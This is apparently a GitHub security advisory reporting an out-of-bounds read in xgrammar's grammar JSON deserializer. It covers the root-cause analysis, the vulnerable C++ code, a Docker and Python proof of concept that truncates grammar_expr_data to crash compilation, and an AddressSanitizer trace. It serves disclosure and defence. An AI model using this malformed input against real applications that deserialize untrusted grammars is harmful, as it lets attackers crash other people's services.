All advisories

Out-of-Bounds Read Through Truncated Grammar Expression Data

mlc-ai/xgrammar / GHSA-9mjp-5gm2-259r

Affected packages

xgrammar pip
Affected versions>= 0.1.23
Patched versionsNot specified

Description

Out-of-Bounds Read Through Truncated Grammar Expression Data

Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730

Summary

At the assessed untagged revision f07ca3c, Grammar::DeserializeJSON accepts a grammar whose expression-offset table still describes complete records but whose grammar_expr_data arena has been truncated to one word. A caller that can supply serialized grammar JSON can pass this malformed object through the public Python API and then compile it. The optimizer eventually asks for an expression at an offset beyond the truncated allocation, and AddressSanitizer reports a four-byte heap-buffer-overflow read in Grammar::Impl::GetGrammarExpr. This demonstrates a memory-safety and process-availability failure; it does not establish controlled disclosure or code execution.

The unsafe reflection-based grammar deserializer was introduced by commit 8d68545 and first shipped in v0.1.23. I inspected every release snapshot from v0.1.23 through v0.2.6rc2 and found the same missing cross-field validation. The runtime reproduction below uses the exact assessed revision, which is 46 commits after v0.2.5; no fixed release or upstream fix was present in the inspected history.

Detail

The grammar AST uses two private vectors in cpp/grammar_impl.h. grammar_expr_data_ is a packed arena of records encoded as [type, payload_length, payload...], while grammar_expr_indptr_ stores the starting word offset of each record. GrammarBuilder::AddGrammarExpr maintains the intended invariant by appending each new offset at the current end of the arena and then appending one complete record. Thus the first offset is zero, every subsequent offset equals the end of the preceding record, and the final record ends exactly at grammar_expr_data_.size().

Grammar::DeserializeJSON is a trust boundary because its input may originate outside the library. At the assessed revision it delegates to the reflection-based AutoDeserializeJSON, which checks the JSON shape and converts both arrays to std::vector<int32_t>, but it does not re-establish their relationship. In particular, it does not require an offset to have a two-word header, require a non-negative payload length to fit in the arena, or require successive offsets to coincide with record boundaries. The Python binding therefore returns a non-null Grammar after the PoC replaces only grammar_expr_data with [0]; the original rules and offset table still refer to the removed records.

Compilation copies that malformed grammar and enters GrammarOptimizer. ByteStringFuser uses the intact rule body ID to visit an expression ID that is valid relative to grammar_expr_indptr_. GetGrammarExpr checks only that ID, and the check is an XGRAMMAR_DCHECK that does not validate the resulting arena offset in any event:

int start_index = grammar_expr_indptr_[grammar_expr_id];
auto start_ptr = grammar_expr_data_.data() + start_index;
auto type = static_cast<GrammarExprType>(start_ptr[0]);
auto data_ptr = start_ptr + 2;
auto data_len = start_ptr[1];
return {type, data_ptr, data_len};

For an expression whose preserved offset is greater than zero, even forming start_ptr is outside the one-word vector's permitted range, and the start_ptr[0] read is out of bounds. Expression zero has offset zero, but its start_ptr[1] header-length read is still one word past the allocation. Which invalid record the optimizer visits first affects the reported address, not the root cause: deserialization created an object whose offset table and packed arena disagree, and every downstream consumer assumes that private representation is already well formed.

Neither compiler configuration nor the tokenizer repairs this invariant. The project's default XGRAMMAR_ENABLE_INTERNAL_CHECK=OFF disables internal assertions, but enabling the existing expression-ID assertion would not help because the PoC's expression IDs are valid; their offsets are not. The tokenizer in the PoC is deliberately ordinary and compilation reaches the optimizer before token matching can constrain the malformed AST. Validation must therefore happen immediately after deserialization and before a grammar is returned or nested in a CompiledGrammar.

The narrow demonstrated primitive is an out-of-bounds read followed by ASan termination. Without ASan, undefined behavior may instead produce a segmentation fault or other process behavior, but the experiment does not show that the read value can be usefully observed or controlled. Exploitation also requires an embedding application to deserialize attacker-influenced grammar JSON and later compile or otherwise consume it; XGrammar itself does not provide a network entry point.

Reproduce

Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.

The following disposable-container command checks out the exact assessed revision, builds the Python binding with AddressSanitizer, changes only the expression arena in a freshly generated valid serialization, and compiles the accepted result. I ran this sequence and observed the heap-buffer-overflow excerpt below. The container is removed afterward and the PoC changes no persistent data.

docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --quiet
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
  python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > repro.py <<'PY'
import json
import xgrammar as xgr

obj = json.loads(xgr.Grammar.from_ebnf('root ::= "a"').serialize_json())
obj["grammar_expr_data"] = [0]
grammar = xgr.Grammar.deserialize_json(json.dumps(obj))
tokenizer = xgr.TokenizerInfo(["a", "<eos>"], stop_token_ids=[1])
xgr.GrammarCompiler(
    tokenizer, max_threads=1, cache_enabled=False
).compile_grammar(grammar)
PY
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$(g++ -print-file-name=libasan.so)" \
python repro.py
DOCKER
Observed AddressSanitizer excerpt

Instruction addresses, process-specific allocation addresses, and container-root source prefixes are omitted; function names, repository-relative source locations, access size, classification, and termination are preserved.

==1250==ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4
    #0 [address omitted] in xgrammar::Grammar::Impl::GetGrammarExpr(int) const cpp/grammar_impl.h:233
    #1 [address omitted] in xgrammar::GrammarBuilder::GetGrammarExpr(int) cpp/grammar_builder.cc:237
    #2 [address omitted] in xgrammar::InPlaceGrammarRewriter::VisitExpr(int)
    #3 [address omitted] in xgrammar::InPlaceGrammarRewriter::Apply(xgrammar::Grammar*)
    #4 [address omitted] in xgrammar::ByteStringFuser::Apply(xgrammar::Grammar*) cpp/grammar_functor.cc:3826
    #5 [address omitted] in xgrammar::GrammarOptimizerImpl::Apply(xgrammar::Grammar const&) cpp/grammar_functor.cc:2810
SUMMARY: AddressSanitizer: heap-buffer-overflow in xgrammar::Grammar::Impl::GetGrammarExpr(int) const
==1250==ABORTING

Credit

Zheng Yu @ Depthfirst